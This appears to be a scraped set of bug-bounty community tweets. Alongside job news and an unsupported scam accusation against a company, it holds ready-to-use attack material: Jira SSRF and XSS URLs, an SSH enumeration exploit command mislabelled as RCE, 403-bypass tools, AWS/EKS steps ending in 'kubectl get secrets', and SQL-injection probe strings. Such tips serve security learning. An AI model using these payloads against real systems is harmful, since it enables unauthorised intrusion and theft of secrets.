What happened Facebook in Bangladesh? account get Auto logout & cant login

Jira Vulnerabilities:

1. CVE-2017-9506(SSRF):
http://<JIRA>/plugins/servlet/oauth/users/icon-uri?consumerUri=http://bing(.)com

2. CVE-2018-20824(XSS):
http://<JIRA>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)

(1/n)

I will join QNAP as Information Security Researcher

medium.com/immunefi/bitsw…

Bug bounty tip: is:issue label:Vulnerable and is:issue label:'Edge case' are your friends on github.com/EdOverflow/can…. :)

#bugbounty #bugbounty tips

Found a $$$$ RCE with CVE-2018-15473

Steps :

1. Found an IP of the company eg: testing.com then cloned the CVE from github.com/Rhynorater/CVE…

2. Ran the command
/sshUsernameEnumExploit.py --username root 0.0.0.0 (ip)

Burpsuite extension to bypass 403 restricted directory.

Installation
BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Fininsh.

github.com/sting8k/BurpSu…

My biggest contribution to github ever made: byp4xx, a simple bash script to bypass 403 forbidden error using methods mentioned in #bugbountytips :
github.com/lobuhi/byp4xx/

Hello World
Found another Scammer
HedgeTrade
Don't use there Service they are Scam To Customer & Employee

If anyone need Proof DM Me
./

We just added publicly disclosed issues from HackerOne sorted by vulnerability type so you can learn what types of vulnerabilities to look for on specific programs. More features in the pipeline on the way to help you with your hunt!

bugbountyhunter.com/disclosed/

A short list of endpoints (From Unknown Resource but thanks to that guy for sharing this with me)
#bugbounty #cybersecurity #bugbounty tips #bugbounty tip #bugcrowd #intigriti #hackerone #bugs #Pentesting

Hello
Friends
I will be Join as Security Consultant at DroitLab (Dhaka)
🙏🙏

Thanks DJI

For Newbie Who Seeking Site for Hunting
github.com/Sajibekanti/Bu…

Hey bountyhunters, here is an honest tip:

Don't rely on twitter.

Stop consuming what makes other hunters money, and start hunting and getting experience with methodologies, techniques, tools, and bug-classes that work for you.

#bugbounty tips #bugbounty

Thanks bugcrowd

$ export AWS_ACCESS_KEY_ID=AKIAI44QH
$ export AWS_SECRET_ACCESS_KEY=wJalrXUtnF
$ export AWS_SESSION_TOKEN=AQoD

aws eks list-clusters | jq -rc '.clusters'

['example']

aws eks update-kubeconfig --name example

kubectl get secrets

boom...
#bugbountytip #bugbountytip s

This is how to find sql-Injection 100% of the time
For site.com/?q=HERE

/?q=1
/?q=1'
/?q=1'
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='

Recently during initial #recon , I came across a vulnerable Splunk instance which had a sensitive information disclosure vulnerability (P3).
Always go deep searching for #exploits and #cves whenever you encounter a third-party service.

#BugBountyTip #security #bugbounty #bugs